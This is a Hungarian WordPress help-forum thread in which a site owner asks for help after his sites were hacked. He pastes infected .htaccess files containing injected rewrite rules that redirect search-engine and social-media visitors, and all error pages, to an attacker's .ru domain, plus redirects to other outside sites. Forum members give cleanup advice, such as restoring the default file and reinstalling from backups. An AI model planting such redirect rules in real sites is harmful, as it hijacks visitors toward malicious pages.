37 válasz erre a témára

[TamasBanki]

egy pár php oldalamat megtámadta a xisicongatarc.ru, aminek eredményeként némelyik oldalam erre mutat: xisicongatarc.ru/emain/index.php

nagyon rossz ez így :z

már olvasom ezt: http://redleg-redleg...or-malware.html és ezt: http://redleg-redleg...4decode-in.html, de ezekhez én már kevés vagyok, mint maci sajtban a brum-brum.
itt is erről van szó: http://www.google.co...c364e5501&hl=en

ha van egy jó megoldási ötleted, várom szeretettel.

Szerkesztve TamasBanki által: 2012-02-07 - 02:17

[KardiWeb]

Üdv,

Eslősoron érdemes lenne belinkelni az oldalad, és talán megnézhetnénk a kimeneti html kódot.
Másodsoron érdemes lenne a tárhely szólgáltatóddal beszélni történt e root, dos támadás a szerver ellen amely a lapodat hostolja.
Harmadsoron érdemes lenne átnézni a szervereden levő fájlokat nem e módosult valamelyik. Gondolok itt .htaccess fájlra és a sablonod könyvtárában levő fájlokra.
Negyedsoron érdemes lenne a bővítményeket is átnézni, nem e valamelyik kártékony kódot tartalmaz.

Végül de nem utolsó sorban érdemes lenne feltelepíteni a WordPress antivírus bővítményt http://wordpress.org...gins/antivirus/

[Efrud]

Ez nagyjából annyi ha átdob valahova, hogy a .htaccess fájlba benne van egy redirect és vissza is teszi, ha nem jó a jogosultság a fájlra, vagy mondjuk lehet nincs frissítve a WP?

[TamasBanki]

Szia KardiWeb és Efrud,

http://the-passive-h...-magazine.info/ about, newsletter és a contact iPHM (jobb oldalt, az About dobozban) mutatnak a xisicongatarc.ru -ra.
6 php file-t átneveztem, ahogy az egyik red-leg cikkben olvastam, most huhu1.php - huhu6.php-ig számozódnak.
Valamikor rosszul telepítettem a Wordpress-t, így az egyik a másikban van. (http://the-passive-h...dpress/wp-admin) Így két .htaccess file-om is van.

Ez az egyik tartalma:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ [url="http://xisicongatarc.ru/emain/index.php"]http://xisicongatarc...emain/index.php[/url] [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ [url="http://xisicongatarc.ru/emain/index.php"]http://xisicongatarc...emain/index.php[/url] [R=301,L]
</IfModule>

ErrorDocument 400 [url="http://xisicongatarc.ru/emain/index.php"]http://xisicongatarc...emain/index.php[/url]
ErrorDocument 401 [url="http://xisicongatarc.ru/emain/index.php"]http://xisicongatarc...emain/index.php[/url]
ErrorDocument 403 [url="http://xisicongatarc.ru/emain/index.php"]http://xisicongatarc...emain/index.php[/url]
ErrorDocument 404 [url="http://xisicongatarc.ru/emain/index.php"]http://xisicongatarc...emain/index.php[/url]
ErrorDocument 500 [url="http://xisicongatarc.ru/emain/index.php"]http://xisicongatarc...emain/index.php[/url]

És ez a másiké:

## BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

<IfModule mod_rewrite.c>
RewriteRule ^rni01/(.*)$ [url="http://medicalun.com/"]http://medicalun.com/[/url] [R,L]
RewriteRule ^ani01/(.*)$ [url="http://martalois.com.ar/images/bar/index.html"]http://martalois.com.../bar/index.html[/url] [R,L]
</IfModule>

Szerkesztve Farkas Győző által: 2012-02-07 - 20:50
Légyszíves a megfelelő tag-eket használni (kód, idézet, stb.)

[Efrud]

A gyökérbe kell lennie egy ilyenek össz vissz:

## BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

Többi mind "vírus".

[TamasBanki]

Most már akkora a gáz, hogy a főoldalon ugyan megjelenik a cikk, de ha a cikk címére kattintva vagy a Read the rest of this entry » -re, esetleg direct linkre kattint valaki, akkor is ez a fránya orosz oldal jön fel.

[TamasBanki]

Idézés: Efrud - Dátum: 2012-02-07 - 15:06

A gyökérbe kell lennie egy ilyenek össz vissz:
...

Bár kicseréltem mindkét htaccessben, még nem lett jó, törlöm azt a 6 huhu-nak átnevezett php file-t is, hátha az meggyógyítja.

Köszönöm,

Tamás

Ezzel ellenőríztem az oldalam, és most én nem találok más hibás file-t: http://the-passive-h...find-string.php

DE még mindig a xisicongatarc.ru -ra mutat

Szerkesztve Farkas Győző által: 2012-02-07 - 20:52
Neked kvégtelen a tárhely az idézésre? Mi szeretnénk áttekinthetővé tenni a tartalmakat. Segítesz? ;)

[hgrg]

wp-config.php-d tartalma?
pluginok?
sablon file-ok?
...

[Efrud]

Hát, igaza van hgrg-nek. Elég sok helyen ott lehet már a dolog. Azokat feltétlen ellenőrizd amiket írt, meg szerintem tényleg írj a szolgáltatónak is.

[hgrg]

"meg szerintem tényleg írj a szolgáltatónak is"
+1 > persze hogy igen, de azt gondoltam ez volt a 0ik lépés és hányaveti-nemtörődöm-nem értek rá lényeg, hogy nem foglalkoztak vele -még-

[TamasBanki]

Idézés: hgrg - Dátum: 2012-02-07 - 16:31

wp-config.php-d tartalma? pluginok? sablon file-ok? ...

az egész oldalt a TC-el végig nézettem, nem találta már meg a xisicongatarc-t
így nem tudom, mit tehetek, már csak a Maxer-ben bízok

Szerkesztve TamasBanki által: 2012-02-08 - 10:27

[hgrg]

És mi van ha az url szét van dobva több darabba? Még nem ejtettünk szót róla, hogy kicsit is rafináltak nem kötik az orrodra, hogy mit művelnek veled -> http://www.google.hu...F-8&q=obfuscate
..
Javaslat:
1. Mindent ments le (adatbázist is természetesen)
2. Törölj le mindent (adatbázist is természetesen)
3. Új telepítés + tartalom migráció + minden 'visszarakott' tartalom pld pluginok újra beszerzése + sablon egy olyan verziójának felrakása amikor még tuti láthatáron sem voltak.
előtte/közben: Azért hogy ez ne forduljon elő megkeresni az okot, hogyan jutottál idáig (pld ha valami plugin sz@rul van megírva vagy a sablonod ősrégi timthumb-ot használ ... ... /*millió lehetőség*/) majd megtenni a szükséges lépéseket ezen problémák kivédésére.

[Farkas Győző]

Idézés: TamasBanki - Dátum: 2012-02-08 - 10:26

az egész oldalt a TC-el végig nézettem, nem találta már meg a xisicongatarc-t
így nem tudom, mit tehetek, már csak a Maxer-ben bízok

Több, mint 20 oldalam fut a Maxer-nél, egyik sem szenvedett még ilyen támadást. A Maxer pedig azonnal ugrik a jelzésre, ennél sokkal kisebb gond esetén is. Kérd meg őket, hogy tegyenek fel a támadás észlelése előtti időpontban meglévő adatbázis és fájlmentést.

Én elgondolkodnék a saját gépről történő fertőzésen is, nem csak feltétlen a te oldaladról, hanem akiknek van hozzáférési joguk, arról az oldalról is.

[TamasBanki]

Csak az én gépem fér hozzá. A Laptopom és a Asztalim.
Azokon hogy tudok rátalálni? Ugyanúgy TC-vel?

Szerkesztve Farkas Győző által: 2012-02-09 - 15:15
Nehéz nem idézni az előtted szólót? :(

[TamasBanki]

Idézés: hgrg - Dátum: 2012-02-08 - 11:42

És mi van ha az url szét van dobva több darabba?

Ajvéhból jelentik:
Tessék?????
Egy szó nem sok, de 2-t értek: BAJ VAN!
Csak a megoldást nem értem.
Most mindent letöltök/tölök, majd feltöltöm az eredeti template legújabb változatát és az összes plugint, ugye? És a végén az összes tartalmat. Jól gonolom?

[TamasBanki]

http://the-passive-h...find-string.php most írtó sok helyen van az a fránya base64_decode

[hgrg]

az nem jó

[TamasBanki]

Még mindig van itt ilyen:


./wordpress/wp-app.php -> contains base64_decode
./wordpress/wp-includes/class-IXR.php -> contains base64_decode
./wordpress/wp-includes/class-simplepie.php -> contains base64_decode

http://the-passive-h...find-string.php

Ami azért fura, mert most töltöttem le innen: http://wphu.org/letoltes

[hgrg]

azzal semmi gond nincsen. egy függvény megléte még nem jelent problémát. a gondot az jelenti amikor ennek segítségével megpróbálnak egy kódrészletet olvashatatlanná/értelmezhetetlenné tenni..

[Czar]

Nagyon sok WP-s oldalt ért támadás az utóbbi időben.
Nekem mindegyiken új WP van és így is!
Nagyon jó lenne egy komplett leírás, hogy miket kell változtatni.
(Better WP security, új 3.3.1, WP frissített téma,frissített pluginek .htaccess védelem, új ftp és admin krixkrax jelszó)
Újra feltörték!
Kezd a t@k@m tele lenni.
Ti hogyan látjátok?